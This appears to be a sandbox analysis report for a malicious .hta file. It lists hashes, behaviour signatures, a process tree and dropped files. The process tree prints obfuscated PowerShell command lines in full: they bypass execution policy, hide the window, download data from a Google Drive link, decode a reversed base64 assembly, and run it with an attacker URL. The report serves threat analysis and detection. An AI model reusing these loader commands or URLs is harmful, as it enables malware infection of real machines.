Analysis

max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64 arch:x86 image:win7-20241023-en locale:en-us os:windows7-x64 system
submitted: 26-10-2024 03:14

Static task: static1

Behavioral task: behavioral1
Sample: fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Resource: win7-20241023-en

Behavioral task: behavioral2
Sample: fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Resource: win10v2004-20241007-en

General

Target: fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Size: 204KB
MD5: 9dbf5ee2610284f5668fb229ba474b95
SHA1: 12b3f4c93e36b9bca1bfecf8fa522748d3631c74
SHA256: fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0
SHA512: 06fe1b0e3ca4e04108fa8a50f60867e42f38e60768aebbc8935a7c24b973cf3546f6f7f4548e9fac67cebe552319d7323fee5eeaa87dc5f958aa23377cb3ccb2
SSDEEP: 96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures

Blocklisted process makes network request (3 IoCs)
flow  pid   Process
3     2784  pOweRSheLl.ExE
6     2864  powershell.exe
8     2864  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run Powershell and hide display window.
pid   Process
2864  powershell.exe
3000  powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
pid   Process
2784  pOweRSheLl.ExE
2064  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow  ioc
5     drive.google.com
6     drive.google.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  pOweRSheLl.ExE
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe

Modifies Internet Explorer settings
description  ioc                                                                                                     Process
Key created  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid   Process
2784  pOweRSheLl.ExE
2064  powershell.exe
2784  pOweRSheLl.ExE
2784  pOweRSheLl.ExE
3000  powershell.exe
2864  powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2784  pOweRSheLl.ExE
Token: SeDebugPrivilege  2064  powershell.exe
Token: SeDebugPrivilege  3000  powershell.exe
Token: SeDebugPrivilege  2864  powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs)
description                       pid   Process         procid_target
PID 2952 wrote to memory of 2784  2952  mshta.exe       30
PID 2952 wrote to memory of 2784  2952  mshta.exe       30
PID 2952 wrote to memory of 2784  2952  mshta.exe       30
PID 2952 wrote to memory of 2784  2952  mshta.exe       30
PID 2784 wrote to memory of 2064  2784  pOweRSheLl.ExE  32
PID 2784 wrote to memory of 2064  2784  pOweRSheLl.ExE  32
PID 2784 wrote to memory of 2064  2784  pOweRSheLl.ExE  32
PID 2784 wrote to memory of 2064  2784  pOweRSheLl.ExE  32
PID 2784 wrote to memory of 2500  2784  pOweRSheLl.ExE  33
PID 2784 wrote to memory of 2500  2784  pOweRSheLl.ExE  33
PID 2784 wrote to memory of 2500  2784  pOweRSheLl.ExE  33
PID 2784 wrote to memory of 2500  2784  pOweRSheLl.ExE  33
PID 2500 wrote to memory of 2512  2500  csc.exe         34
PID 2500 wrote to memory of 2512  2500  csc.exe         34
PID 2500 wrote to memory of 2512  2500  csc.exe         34
PID 2500 wrote to memory of 2512  2500  csc.exe         34
PID 2784 wrote to memory of 2340  2784  pOweRSheLl.ExE  36
PID 2784 wrote to memory of 2340  2784  pOweRSheLl.ExE  36
PID 2784 wrote to memory of 2340  2784  pOweRSheLl.ExE  36
PID 2784 wrote to memory of 2340  2784  pOweRSheLl.ExE  36
PID 2340 wrote to memory of 3000  2340  WScript.exe     37
PID 2340 wrote to memory of 3000  2340  WScript.exe     37
PID 2340 wrote to memory of 3000  2340  WScript.exe     37
PID 2340 wrote to memory of 3000  2340  WScript.exe     37
PID 3000 wrote to memory of 2864  3000  powershell.exe  39
PID 3000 wrote to memory of 2864  3000  powershell.exe  39
PID 3000 wrote to memory of 2864  3000  powershell.exe  39
PID 3000 wrote to memory of 2864  3000  powershell.exe  39
Processes (indented by process-tree depth)

mshta.exe (PID 2952)
  Image: C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  pOweRSheLl.ExE (PID 2784)
    Image: C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
    Command line: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'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'+[Char]34+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 2064)
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    csc.exe (PID 2500)
      Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\djvb2aru.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      cvtres.exe (PID 2512)
        Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES713B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC713A.tmp"
        - System Location Discovery: System Language Discovery

    WScript.exe (PID 2340)
      Image: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      powershell.exe (PID 3000)
        Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        powershell.exe (PID 2864)
          Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: dc1739739654bccab033baab240ebe52
SHA1: 4ee3a93bbc458251ba539a114260b3d0fd791c7a
SHA256: e9dc32b701c8c4ad32c86e7564db7ceaefae8b968d753874293efc6c62b40f44
SHA512: f32fd27194cee9a5e6f0038d34cbee13fd142c11d0627c6f9e376da39b791c4e5d0789d96bc1f5f8fe099170d15305910b2a8f9537f864bab93410c3708eb184

Filesize: 3KB
MD5: 3dfb950a473940ace32a7c867ccf9076
SHA1: bf279fcb4c105e5923900173ea70c10e42e97cf5
SHA256: 66beb4d8277c96ace1e07e669723305df351c1646d57cc49c1622a2efb9bc70e
SHA512: 8cc7b3612bba28fd96430fa1e77517ebc86d69d452fab9a73d7fc880bff1690f02a9e639e6bdc2de2b387c9707c14be208da3b040b2c2c1f6f910fcb973796bd

Filesize: 7KB
MD5: 47d28c521ffd10fda60ff9c87ea3662c
SHA1: 11bab85687d8010b0aeb23c1e5ff1d93a23e2f1b
SHA256: 7a39e328db7bca2da514b1b75d09f9b40e01ca7d6dc73762353228698ecbee82
SHA512: 8e3174ba7543ea7c03c31c2fcd9d9fd26b75d0f1e94674d90486e6319b334cfb255d742cd765cb660caf1a180f503ef5cf25f1771cad2cc99c2fb3d2077efc9a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 802344128fe036532b119b67f3453e1d
SHA1: ae2000823fe69a49698c0ae65c0443b5e5c8b615
SHA256: 60cc1bbd7cccf36d1d1fa00b7559deb5e407641f91e722de48b247c4eb4ce39c
SHA512: 4c4f23a5e2fcf3acc7670cc17a31af47cdd1849dbbc16622234bd33175f35096f572add5e14dd5b8636268d14b75f4d340a6aefa85ced38b9531bf36b9ea02a6

Filesize: 136KB
MD5: 74339d80989d10693dbc1115d1cf3eb4
SHA1: bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44
SHA256: a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d
SHA512: 4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Filesize: 652B
MD5: 4ab336f87777597298ef2d5585f4c30b
SHA1: 7cda2d4dc4e0b57568269881ee23b0473c53252a
SHA256: b04b54fd4d61d20b15624be12b63935bda4e86440220c98da8ff3dc5d4ba3532
SHA512: 5174ad02bdd7471df99713d5a769bc51effd2e0ee7390c73393aa561504f1cd969230141e5f987f6d37e8c345f28ee916c05fa6bd0ec786c5d6773aa1c46e21d

Filesize: 480B
MD5: ce22e90871744b25a04ac8c5691f49cc
SHA1: bc0a93c1fe61e00daa34774994b638d19f735228
SHA256: 3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546
SHA512: 5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Filesize: 309B
MD5: 47ccea66770dd69f044feeb829203f4a
SHA1: 1b89af4daeb211bbee5feaec1cb3c2796d6033d6
SHA256: 3edc2445b884bfc912b9e2d3ef054c55bb400c806a120c421ee5b41f3e83bd9d
SHA512: f5e626e3d4ed089ee1e68d55d3cd9123b643b0af73530ad4a9dc914c4450665a7a0de38d1d69e8fa03d4b25e232dc46b7802a8014627ead6216792bc9a7b8b4e